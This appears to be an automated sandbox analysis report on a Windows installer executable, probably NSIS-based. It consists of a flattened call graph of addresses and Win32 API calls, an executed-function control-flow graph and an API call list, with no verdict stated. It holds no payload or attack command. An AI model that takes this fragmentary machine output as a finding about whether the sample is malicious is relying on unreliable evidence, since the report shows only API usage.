WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                              Executed Functions

                                                                                              Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                              • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
